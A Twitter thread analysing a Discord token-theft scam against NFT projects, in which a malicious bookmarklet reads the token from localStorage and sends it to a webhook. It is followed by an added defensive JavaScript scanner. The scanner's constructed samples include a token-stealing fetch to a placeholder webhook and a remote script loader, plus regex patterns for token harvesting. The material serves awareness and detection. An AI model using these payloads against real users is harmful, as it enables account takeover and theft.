8 Tweets 15 reads Mar 01, 2022
⚠️ Analysis of how $150,000 was stolen & exploring how multiple NFT projects were hacked today.
Retweet to spread awareness 🚨
1/ I'm sure many projects are aware of the most common method being used right now, where staff are socially engineered into accidentally sharing their Discord token. If you aren't aware of this method, please read this thread
2/ Now let's explore this new method. It starts with a collaboration proposal; in this case the hackers were pretending to be @WonderPals. The hackers create a replica Discord and bot members to make it seem big. To get whitelisted you're asked to visit their website
3/ and enter your whitelist key. Normal stuff, right? Then you're asked to drag this button to your bookmarks to be able to enter the code. What you're really bookmarking here is JavaScript that executes code downloaded externally.
4/ They will also ask you to open Discord in your Chrome browser. Once you click on the bookmark to enter the code, it will run this code, which reads your Discord localStorage (where your Discord token is located) and sends your token to their webhook.
5/ Discord tokens let you log into any account without needing a password and fully bypass 2FA. The only way to change your Discord token is to change your password. This was used in the @CosmosKidzNFT compromise today. I'm glad they reached out to me
6/ so I was able to do a deep dive into this and find out what really happened. I will also be auditing their staff and building security measures for them. For any projects reading this, I'm always open to help, feel free to DM me if you have any inquiries.
UPDATE:
- Crypto Chicks
- Divine Anarchy
- Women of Crypto
- NANOPASS
- Fortune Friends Club
- The Littles
- Moshi Mochi
All hacked in the past few days with exactly the method in this thread. Over 1000 ETH stolen. Spread this around to all projects because it's not going to stop.
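The bookmarklet pattern in tweets 3 and 4 (a bookmark whose URL is `javascript:` code that pulls in a remote script, reads the token out of Discord's localStorage and posts it to a webhook) can be screened for mechanically before a staff member ever clicks it. The following is an added example, not code from the thread or from any of the projects named in it. The bookmark strings it scans are constructed to mimic the pattern; the script and webhook URLs in them are placeholders, and the indicator weights and the "malicious" threshold are assumptions chosen for illustration.

```javascript
// Added example (not from the thread): heuristic scanner for bookmarklets of the
// kind described above. A bookmarklet is a bookmark whose URL starts with
// "javascript:"; clicking it runs that code in the current tab, so a bookmark
// that loads a remote script, touches localStorage (where the Discord token
// lives) and talks to a webhook is the pattern worth flagging.

// Indicator weights and the verdict threshold are assumptions for illustration.
const INDICATORS = [
  // The scheme is what makes a bookmark executable at all.
  { name: 'javascript-scheme', weight: 1, re: /^\s*javascript:/i },
  // Loader stage: inject a <script> whose src is fetched from an external host.
  { name: 'remote-script-load', weight: 3,
    re: /createElement\s*\(\s*['"]script['"]\s*\)|\.src\s*=\s*['"]https?:\/\//i },
  // Reading localStorage from a bookmarklet is how the token gets harvested.
  { name: 'localstorage-access', weight: 2, re: /\blocalStorage\b/ },
  // Exfiltration channel: a Discord webhook URL or any outbound request API.
  { name: 'outbound-request', weight: 2,
    re: /discord(app)?\.com\/api\/webhooks|\bfetch\s*\(|XMLHttpRequest|navigator\.sendBeacon/i },
];

// Bookmarklets are usually percent-encoded when stored; decode before matching
// and fall back to the raw string if the encoding is malformed.
function decodeBookmarkUrl(url) {
  try {
    return decodeURIComponent(url);
  } catch (e) {
    return url;
  }
}

// Returns { hits, score, verdict } for one bookmark URL.
function scanBookmark(url) {
  const body = decodeBookmarkUrl(url);
  const matched = INDICATORS.filter((ind) => ind.re.test(body));
  const hits = matched.map((ind) => ind.name);
  const score = matched.reduce((sum, ind) => sum + ind.weight, 0);
  let verdict;
  if (!hits.includes('javascript-scheme')) {
    verdict = 'ok'; // plain http(s) bookmarks navigate, they do not execute code
  } else if (score >= 4) {
    verdict = 'malicious';
  } else {
    verdict = 'suspicious'; // any javascript: bookmark deserves a look
  }
  return { hits, score, verdict };
}

// Constructed samples. Hosts use the reserved .invalid TLD; the webhook id is 0.
const STEALER_PAYLOAD =
  "void(fetch('https://discord.com/api/webhooks/0/placeholder'," +
  "{method:'POST',body:localStorage.getItem('token')}))";

const SAMPLE_BOOKMARKS = {
  whitelistPage: 'https://whitelist.example.invalid/enter-code',
  remoteLoader:
    "javascript:(function(){var s=document.createElement('script');" +
    "s.src='https://cdn.example.invalid/wl.js';document.body.appendChild(s);})();",
  encodedStealer: 'javascript:' + encodeURIComponent(STEALER_PAYLOAD),
  harmlessBookmarklet: 'javascript:alert(document.title)',
};

for (const [label, url] of Object.entries(SAMPLE_BOOKMARKS)) {
  const { verdict, score, hits } = scanBookmark(url);
  console.log(`${label.padEnd(20)} ${verdict.padEnd(10)} score=${score} hits=${hits.join(',') || '-'}`);
}
```

The loader sample is flagged on its own, without any localStorage or webhook string in it, because the thread's point is that the bookmark only has to fetch the real payload from elsewhere; the second stage never appears in the bookmark itself. In practice this check would run over an exported bookmarks file for staff accounts, and a hit on a `javascript:` bookmark that staff did not knowingly create is the signal to rotate the Discord password (which is what invalidates the token).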